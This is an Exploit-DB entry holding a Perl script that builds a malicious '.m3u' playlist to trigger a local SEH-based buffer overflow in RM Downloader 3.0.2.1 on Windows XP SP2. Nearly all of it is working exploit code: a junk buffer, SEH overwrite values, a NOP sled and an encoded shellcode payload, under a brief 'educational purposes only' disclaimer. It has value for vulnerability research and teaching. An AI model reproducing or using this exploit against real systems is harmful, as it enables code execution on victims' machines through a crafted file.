RM Downloader - '.m3u' Local Buffer Overflow (SEH)

EDB-ID:

11202

CVE:

N/A

Author:

jacky

Type:

local

Platform:

Windows

Published:

2010-01-19

#!/usr/bin/perl -w
# Author: Jacky
# Version: 3.0.2.1
# Tested on: Windows XP SP2

#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
#Written by Jacky
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct
#Ret Vulnerability , so i tried by SEH and Voila !
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!

my $file="RM.m3u";
my $junk="A"x35059;
my $nseh="\xeb\x1e\x90\x90";
my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
#address and it worked Perfectly ;-)
#This Address works too ::> 0x01DD1111
my $nops="\x90"x25;
my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b".
"\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92".
"\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5".
"\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd".
"\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6".
"\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0".
"\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88".
"\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1".
"\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78".
"\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b".
"\xd9\xbe\x8f\xce\x25";

my $junk2="A"x5000;
my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;


open(INI,">$file");
print INI $payload;
print "[+]File Created Successfully!\n";
print "[+]Done!\n";
close(INI);